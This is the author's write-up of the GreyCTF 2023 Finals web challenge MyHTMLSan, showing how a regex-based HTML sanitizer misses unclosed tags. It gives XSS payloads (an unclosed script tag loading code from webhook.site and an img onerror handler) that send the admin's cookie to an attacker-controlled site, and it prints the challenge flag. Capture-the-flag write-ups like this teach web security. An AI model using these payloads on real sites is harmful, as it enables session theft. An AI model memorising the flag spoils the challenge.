GreyCTF 2023 Finals: MyHTMLSan

Table of Contents

This is the author’s writeup for the challenges MyHTMLSan in the web category.

This describes the intended solution when I made the challenge.

Challenge description #

LiveOverflow inspired me to host html files, I hope I made them safe enough.

Junhua

There was no source code for this challenge, only a link to the website.

My Notes #

This was meant to be an easy challenge.
The inspiration for the challenge came from LiveOverflow’s video on HTML Specification.
Source Code can be found here.
Could have locked it down further with a black list or set the headless browser to not follow redirects.

Notes to future self when setting up this challenge. #

Spend more time to check for unexpected solutions

The Website #

MyHTMLService Main Page — myHTMLService Main Page

When we first visit the website, we are greeted with a simple website with a form where a user can submit their HTML Code. We also see an embed LiveOverflow Video explaining the HTML Specification.

After submitting our HTML code, we are greeted with a page that shows us the output of our HTML code (if any). There is also a Report to admin button that we can use to report this link.

The submission location is using UUID to prevent users from guessing the location of other submissions.

Looking at the question #

As you can see from the image above, we can see that normal text is not sanitized by the page. Let us try to use some HTML Tags.

After submitting <h1>test</h1>, we see the following output.

We can see from the above that the h1 tags were stripped.

To complete this challenge, we will have to find some sort of XSS vulnerability within the website and prompt the admin to visit the website to exploit it.

Finding the XSS vulnerability #

Another hint that we have yet to look into is the LiveOverflow video that is embedded in the website. Within the video, he talks about how he has “discovered” a html sanitizer bypass that allows him to inject javascript into the website but eventually found out that it was a perk of the HTML specification.

He also mentions specifically that any opening tags < followed by numbers, IE: [0-9] are not counted as HTML tags and will be rewritten.

Let us try the example that he gave in the question, <22 foo="bar<h1>">test</22>.

We can see from the image that this too was stripped from the output.

Hmm… maybe there was something else in the video that hints at the answer for this question.

Towards the end of the video, he talks about how HTML Cannot be parsed using regex. He then shows us an example of a regex that he found online that can parse HTML.

Perhaps the sanitizer is made from regex.

Regex from the video #

The post that he mentioned in the video here

The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is used to match HTML tags. However, there are some issues with this regex.

It does not match any tags that do not have a closing tag. (IE: <br instead of <br />)

Let us try it out on the website.

For the above result, we submitted the payload <h1 without the closing tag. As you can see from the rendered HTML, the h1 tag was not sanitized.

The solution #

With that, we can make use of different tags to inject our javascript payload. There are multiple solutions.

Script Payload #

<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

With the payload above, it was shown correctly as a script tag on the page.

Chrome Blocked Script — Chrome blocked the script

However, the chrome browser blocked the loading of the script.

This is due to a feature in chrome which blocks Cross Origin Reads for more information you can visit the link above.

TLDR: Chrome blocks the loading of scripts from other domains which are not of content type text/javascript.

Thus, to make it work, we will have to make use of tools like webhook.site.

Edit Webhook Site page content — Editing page content to be text/javascript with an alert script

Over here we can edit the payload that appears when someone visits our website.

<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"

Now with the above payload, we should be able to load any javascript that we want.

Now that we can trigger an alert, we can simply change the script to a redirect request before reporting the page to the admin to get the flag.

document.location.href = "<your site here>?cookie=" + document.cookie;

We can simply redirect to the page that we want with the admin’s cookie and retrieve the flag.

Img Payload #

There is also an alternative using the img tag as well

<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"

This will have the same effect as the script tag above (and is faster).

Flag #

Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}

Useful Links #

LiveOverflow’s video on HTML Specification to learn about parsing HTML with Regex
Webhook.Site to have a attacker controlled server to get cookies
CORB to learn about why chrome blocks the script from loading
MyHtmlSan Source Code
StackOverflow Post on why you should not use regex on html